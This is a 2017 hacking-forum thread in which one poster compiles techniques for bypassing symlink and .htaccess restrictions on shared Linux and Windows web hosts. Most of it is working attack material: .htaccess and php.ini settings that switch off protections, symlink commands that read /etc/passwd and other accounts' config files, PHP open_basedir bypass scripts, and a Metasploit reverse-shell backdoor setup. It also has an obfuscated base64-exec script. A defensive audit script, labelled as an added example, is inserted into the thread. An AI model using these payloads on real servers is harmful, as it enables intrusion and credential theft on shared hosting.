Topic: All Linux Win Server ByPass Symlink Htaccess Techniques
KingSkrupellos
Comment: #1
All Linux Win Server ByPass Symlink Htaccess Techniques
19.09.2017 16:04
Topic Title => Linux and Windows Server ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability Bypass Techniques [ 19.09.2017 ]

Prepared by => KingSkrupellos - Cyberizm Digital Security Team

The Article You Must Read Before Reading All of This =>

Disabling Safe Mode on Servers: Detailed Explanation

Some Video Explanations on the Topic =>

Table of Contents =>

1) - [ Bypass Directory ]-

2) Bypass Symlink with .htaccess

3) LiteSpeed Bypass [SymLink]

4) Litespeed Symlink 403 Forbidden Bypass

5) - [ Include symlink ]-

6) - [ Bypass Litespeed ] -

7) - [ ByPass OVH Hosting ]-

8) - [ Bypass Symlink 403 forbidden ] -

9) Bypass symlink via .htaccess 2016

10 ) ByPass Passwd in LiteSpeed General Logic

11 ) Bypass Symlink (Priv8) Code

12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass

13 ) Server Bypass OVH & BlueHost Symlink Code 2014

14 ) Symlink Bypass 404

15) Internal Server Error ByPass Error and Solution Code

16) Metasploit Bypass Backconnect & Get Domainowners

17 ) Server Bypass read and edit file with python script Work On (Linux,Win)

__________________________________________

- [ Bypass Directory ]-

Code:
https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html

Bypass Symlink with .htaccess

Code:
<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>

LiteSpeed Bypass [SymLink]

Code:
OPTIONS  Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Litespeed Symlink 403 Forbidden Bypass

Code:
python shell , CGI PERL Shell
and .htaccess
the htaccess code is
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
===============
what we should do ?
just open the cgi bypass shell
and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt


- [ Include symlink ]-

Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
DirectoryIndex new
DirectoryIndex config.ini

- [ Bypass Litespeed ] -

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

- [ Bypass OVH ]-

Code:
wew.shtml
do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php

- [ Bypass Symlink 403 forbidden ] -

Code:
.htaccess
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root
php.ini
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
ln -s / CoderSec


Bypass symlink via .htaccess 2016

Code:
.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any


ByPass Passwd in LiteSpeed General Logic

Code:
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Simple Bypass Internal Server Error Symlink 2016

Code:
A good way to bypass the forbidden error when reading the passwd file.
The general approach:


ln -s /etc/passwd passwd.txt

When you open the passwd file, the forbidden error is encountered.
For the bypass =>

To bypass it, one of the following two commands is used:
ln -s /etc/passwd README
ln -s /etc/passwd HEADER
The second command is run in a directory, and when we go back to that directory the passwd file will be shown to us.
SPT to b0x

Bypass Symlink (Priv8)
How you can bypass Symlink in linux webserver ?

1/ Create a folder

2/ Upload inside

".htaccess"
  
CODE:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

3/ Bypass manually

ln -s /home/user/public_html/t0ph4cking.txt

Bypass Symlink 403 Forbidden with .htaccess

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass

Code:
Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php

Symlink Bypass 404

Code:
<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
by KingSkrupellos - Cyberizm Digital Security Team

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img
src="http://www.cyberizm.org/"><P>This is exploit
from <a
href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
Lab - SecurityReason</a> labs.
Author : KingSkrupellos
<p>Script for legal use only.
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>More: <a href="http://cyberizm.org/">Cyberizm</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
"]).'" method="post"><input type="text" name="file" size="50"
value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
value="Create Symlink"></form>';

if(empty($file))
exit;

if(!is_writable("."))
die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

PHP Symbolic Link Open_Basedir Bypass Vulnerability

script1.php
<?
   symlink("a/a/a/a/a/a/", "dummy");
   symlink("dummy/../../../../../../etc/passwd", "xxx");
   unlink("dummy");
   while (1) {
        symlink(".", "dummy");
        unlink("dummy");
   }
?>

script2.php
<?
while (1) {
        print @file_get_contents("xxx");
}
?>


Server Bypass OVH & BlueHost Symlink Code 2014

Code:
<? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
fwrite($anu,"ReadmeName x.txt");
echo'<a href=sl/x.txt>CHECK</a>';
}


Internal Server Error ByPass Error and Solution Code

Code:
".htaccess":

#Bypass By Cyberizm.Org
<DIRECTORY /..../user/..../>
OPTIONS Indexes ExecCGI FollowSymLinks
AllowOverride All
</DIRECTORY>
AddType txt .php
AddHandler txt .php


"php.ini":

#Bypass By Cyberizm.Org
safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON

Metasploit Bypass Backconnect & Get Domainowners

Code:
Sometimes on a server, while working with a CGI telnet shell, you get an annoying error called internal server error. There are many ways to solve this, but the most reliable one is to log in to cPanel, go to the MIME types section and write in the first line

application/x-httpd-cgi

and then write the extension of your CGI shell in the second line. For example, if your CGI shell is named ali.veli, write veli in the second line and confirm, then go to the browser and refresh the address where that CGI shell is located. Of course, before doing this refresh, we must not forget to give chmod 755 to our CGI shell named ali.veli.

First, before uploading the CGI to our server, we open our Perl code and at the very top

we write #!/usr/bin/perl -I/usr/local/bandmain and upload it to our server.

If you still get an error on the server, I would like you to try the Web Shell CGI

http://archive.is/UT8xf Here it is

.htaccess code :
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options +ExecCGI
AddHandler cgi-script cgi pl wasRewriteEngine on
RewriteRule (.*)\.was$ $1.was

Server Bypass read and edit file with python script Work On (Linux,Win)

Code:
////////////////////SET UP BACKDOOR////////////////////
use payload/php/reverse_php
set LHOST [You Wan Ip] set LPORT 22
set ENCODER php/base64
generate -t raw

////////////////SET UP LISTENING/////////////////
use exploit/multi/handler
set LHOST [You Lan IP] set LPORT 22
set payload php/reverse_php
exploit

/////////////////// RUN BACKDOOR////////////////
php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
//////////////////CAT /ETC/PASSWD//////////////
cat /etc/passwd > passwd.txt
///////////////////CAT USER-DOMAIN/////////////
cat /etc/virtual/domainowners > domain.txt

Symlink 404 Not Found Script

Code:
#!/usr/bin/python
#-------------------------------------------------------------------------------
# Author:     KingSkrupellos
# WebSite    Cyberizm.Org
#-------------------------------------------------------------------------------
import base64;
exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsL​mNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9I​HJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlI​HRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2luc​HV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb​3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0b​yB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZ​GluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgc​HJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0Z​Q0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlI​HRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpb​GUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ​1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZ​SAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNC​g0KI0RvbmUgQnkgT21hbnJvb3Q='))

That is all. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
(This post was last edited on 19.09.2017 at 16:46 by KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Rep given by: The_ZiziL , Dessy , Machscher1Turk , Aslan Bacanak
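
A defender-side check for the patterns listed in the post above, as an added example that is not part of the original thread: it walks one hosting account's home directory and reports .htaccess files that remap script types, re-enable symlink following or pull a file into autoindex listings, plus symlinks that resolve outside the account. It generalizes the post's individual snippets into one audit; the finding labels, function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directive patterns taken from the .htaccess snippets in the post; labels are this example's own.
RISKY = [
    (re.compile(r"^\s*(AddType|AddHandler)\s+(txt|text/plain|application/octet-stream"
                r"|server-parsed)\b.*\.(php|html)\b", re.I), "script-type-remapped"),
    (re.compile(r"^\s*RemoveHandler\s+.*\.php\b", re.I), "php-handler-removed"),
    (re.compile(r"^\s*Options\s+.*(?<!-)\b(FollowSymLinks|All)\b", re.I), "symlinks-followed"),
    (re.compile(r"^\s*(ReadmeName|HeaderName)\s+\S+", re.I), "autoindex-file-inclusion"),
]

def scan_htaccess(path):
    """Return the sorted finding labels for one .htaccess file."""
    found = set()
    with open(path, errors="replace") as fh:
        for line in fh:
            found.update(label for rx, label in RISKY if rx.search(line))
    return sorted(found)

def audit(account_home):
    """Report risky .htaccess files and symlinks that resolve outside the account."""
    home = os.path.realpath(account_home)
    report = {"htaccess": {}, "symlinks": []}
    for root, dirs, files in os.walk(home, followlinks=False):
        for name in dirs + files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, home)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([home, target]) != home:
                    report["symlinks"].append((rel, target))
            elif name == ".htaccess" and (hits := scan_htaccess(full)):
                report["htaccess"][rel] = hits
    return report

def build_sample():
    """Constructed sample account tree (not real data) mirroring the post's layout."""
    base = tempfile.mkdtemp(prefix="acct_")
    web = os.path.join(base, "public_html", "sl")
    os.makedirs(web)
    with open(os.path.join(web, ".htaccess"), "w") as fh:
        fh.write("Options +FollowSymLinks\nAddType text/plain .php\nReadmeName x.txt\n")
    os.symlink("/etc/passwd", os.path.join(web, "x.txt"))
    return base

if __name__ == "__main__":
    print(audit(build_sample()))
```

On a shared host the durable fix is server-side: restrict what `AllowOverride` lets a user-writable .htaccess change and allow only `SymLinksIfOwnerMatch`, so findings from a scan like this cannot take effect.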
The_ZiziL
Comment: #2
RE: All Linux Win Server ByPass Symlink Htaccess Techniques
19.09.2017 16:05
Well done King, you explained it superbly.

One who feels no shame before God feels no shame before people either…
Göktürk-X
Comment: #3
RE: All Linux Win Server ByPass Symlink Htaccess Techniques
19.09.2017 16:06
Well done, brother.
Einstein
Comment: #4
RE: All Linux Win Server ByPass Symlink Htaccess Techniques
20.09.2017 11:31
Thanks

In the land of the blind, seeing is considered a disease.
- Cenap Şahabettin
ghost21
Comment: #5
RE: All Linux Win Server ByPass Symlink Htaccess Techniques
20.09.2017 13:36
Very nice, well done.

facebook.com/100016622081317